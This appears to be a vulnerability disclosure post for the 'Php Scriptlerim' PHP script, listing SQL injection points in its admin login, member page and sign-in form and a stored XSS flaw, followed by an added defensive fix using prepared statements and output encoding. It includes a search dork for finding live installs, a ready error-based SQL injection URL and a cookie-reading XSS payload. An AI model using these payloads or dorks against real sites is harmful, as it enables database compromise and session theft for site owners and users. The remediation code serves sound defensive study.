Powered by Php Scriptlerim Multi Vulnerability

x-Qey

Tested on : Kali Linux / Linux
Author : GRAY HAT
Dorks : "Powered By : Php Scriptlerim" "İletişim : info@phpscriptlerim.com" (TR )
1.

SQL Injection : yonetim/index.php
Panel Code : $query = mysql_query("SELECT * FROM administrator WHERE username='$username'");

EXP : http://localhost/phpscriptlerim/yonetim/index.php

Post Code : username=admin( SQL INJECTION HERE )&password=admin&gonder=Giri%C5%9F+Yap
2.
SQL Injection : uyedetay.php

Member Code : mysql_query("select * from uyeler where sefurl='$url'"); $url = $_GET['url'];
EXP : http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL( SQL INJECTION HERE )

http://localhost/phpscriptlerim/uyedetay.php?url=ETHİCAL%27%20AND%20%28SELECT%203581%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28version%28%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27Hvkg%27=%27Hvkg
XSS : uyebilgileri.php

if(isset($_POST['gonder'])){

$text = $_POST['text'];
$text1 = $_POST['text1'];
$password = $_POST['password'];
$parola = md5($password);

if($text==""||$text1==""){ echo '<font color="red"><b>Alanları boş geçemezsiniz.</b></font><br><br>'; }

<li class="clearfix">
<label>İkinci İsim</label>
<input type='text' name='text' value="<?php echo $bbb['text']; ?>" id='name' maxlength="55" />
<div class="clear"></div>


EXP : http://localhost/phpscriptlerim/uyebilgileri.php

XSS post : text=1"><script>alert(document.cookie)</script>&password=&text1=1"><h3>hh</h3>&gonder=Kaydet
SQL Inj : signin.php

if(isset($_POST['gonder'])){

$email = $_POST['email'];
$sifre = $_POST['sifre'];
$tarih = date('Y-m-d');
$parola = md5($sifre);

if($email==""||$sifre==""){ echo '<font color="red"><b>Bütün alanları doldurmanız gerekmektedir.</b></font><br><br>'; }else{

$xlb = mysql_query("SELECT * FROM uyeler WHERE email='$email'")


EXP : http://localhost/phpscriptlerim/signin.php

SQL Post : email=theethical@facebook.com( SQL INJECTION HERE )&sifre=1111&security=a4f29&gonder=Giri%C5%9F

Admin Panel : http://localhost/phpscriptlerim/yonetim/index.php
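
Fix for the SQL injection points and the XSS listed above, as an added example that is not part of the original post or of the Php Scriptlerim code: bound parameters for the lookups, password_hash()/password_verify() in place of md5(), and htmlspecialchars() for the form value. The in-memory SQLite database, the reduced uyeler schema, the sample row and the function names are assumptions made for the example.

```php
<?php
// Added example: hardened counterparts of the queries and form output in the post.
// Schema and row are constructed; in-memory SQLite stands in for the script's
// MySQL database so the file runs offline. With pdo_mysql, also set
// PDO::ATTR_EMULATE_PREPARES to false so the server does the binding.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE uyeler (id INTEGER PRIMARY KEY, sefurl TEXT, email TEXT, parola TEXT, text TEXT)');

// Constructed row; password_hash() replaces the unsalted md5() used by the script.
$ins = $pdo->prepare('INSERT INTO uyeler (sefurl, email, parola, text) VALUES (?, ?, ?, ?)');
$ins->execute(['ornek-uye', 'user@example.com', password_hash('s3cret', PASSWORD_DEFAULT), 'x"><b>bold</b>']);

// uyedetay.php: the value is bound, never concatenated into the SQL text.
function findBySefurl(PDO $pdo, string $url): ?array
{
    $st = $pdo->prepare('SELECT * FROM uyeler WHERE sefurl = :url');
    $st->execute([':url' => $url]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// signin.php and yonetim/index.php: bound lookup, then password_verify().
function login(PDO $pdo, string $email, string $sifre): bool
{
    $st = $pdo->prepare('SELECT parola FROM uyeler WHERE email = :email');
    $st->execute([':email' => $email]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($sifre, $hash);
}

// uyebilgileri.php: encode stored values for the HTML attribute context.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

var_dump(findBySefurl($pdo, 'ornek-uye') !== null);         // legitimate slug
var_dump(findBySefurl($pdo, "ornek-uye' OR '1'='1"));       // quote is treated as data
var_dump(login($pdo, 'user@example.com', 's3cret'));        // correct credentials
var_dump(login($pdo, "user@example.com' -- ", 'anything')); // comment marker is data too
$row = findBySefurl($pdo, 'ornek-uye');
echo '<input type="text" name="text" value="' . attr($row['text']) . '" maxlength="55" />', "\n";
```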
 

Copyright® Ajanlar.org 2012